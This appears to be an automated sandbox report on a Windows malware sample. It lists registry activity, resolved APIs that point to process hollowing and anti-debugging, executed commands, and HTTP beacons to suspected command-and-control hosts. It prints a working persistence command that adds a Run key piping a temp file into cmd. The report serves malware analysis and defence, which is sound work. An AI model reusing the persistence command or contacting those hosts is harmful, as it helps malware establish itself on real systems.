HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ncvmxzoureascvnz

Write Keys

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ncvmxzoureascvnz

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.GlobalMemoryStatusEx
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.VirtualProtect
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
ntdll.dll.NtQuerySystemInformation
kernel32.dll.GetModuleFileNameW
shfolder.dll.SHGetFolderPathW
kernel32.dll.CopyFileW
kernel32.dll.LocalFree
kernel32.dll.CreatePipe
kernel32.dll.DuplicateHandle
kernel32.dll.GetStdHandle
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.CreateProcessW
kernel32.dll.GetFileType
kernel32.dll.GetConsoleCP
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.GetConsoleOutputCP
kernel32.dll.WriteFile
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
kernel32.dll.SetThreadUILanguage
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
ntdll.dll.NtQueryInformationProcess
kernel32.dll.GetTempPathW
kernel32.dll.CreateFileW
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess

Execute Commands

"cmd"
"C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ncvmxzo.exe"
reg  add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ncvmxzoureascvnz" /d "cmd /c type "C:\Users\Seven01\AppData\Local\Temp\ncvmxzoureascvnz.txt" | cmd"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01b_64 Seven01b_64 VirtualBox 2018-03-15 15:10:19 2018-03-15 15:13:09 170

16 HTTP Request(s) detected

http://www.blrsi.com/hx227/?xN6Tir2P=kq3bp7KFfwPJjjUcpMjE6VKooA66/cNDjBaQ6qcWC50+lt9iyP9DQ8sETMJKV4pFHVACpRdr&9r=2dOPG09pd
  • Hostname: www.blrsi.com
  • IP Address: 199.59.242.150
  • Port: 80
  • Count: 1

GET /hx227/?xN6Tir2P=kq3bp7KFfwPJjjUcpMjE6VKooA66/cNDjBaQ6qcWC50+lt9iyP9DQ8sETMJKV4pFHVACpRdr&9r=2dOPG09pd HTTP/1.1
Host: www.blrsi.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.khamattqy.com/hx227/?xN6Tir2P=Rl+S/kQ13KpkGAa/VP2WOr8jxZkMJnvIkG8+NwH7jWTSEttFFF+rofwSsSy1KD7beiZBP9Me&9r=2dOPG09pd
  • Hostname: www.khamattqy.com
  • IP Address: 162.213.250.143
  • Port: 80
  • Count: 1

GET /hx227/?xN6Tir2P=Rl+S/kQ13KpkGAa/VP2WOr8jxZkMJnvIkG8+NwH7jWTSEttFFF+rofwSsSy1KD7beiZBP9Me&9r=2dOPG09pd HTTP/1.1
Host: www.khamattqy.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.khamattqy.com/hx227/
  • Hostname: www.khamattqy.com
  • IP Address: 162.213.250.143
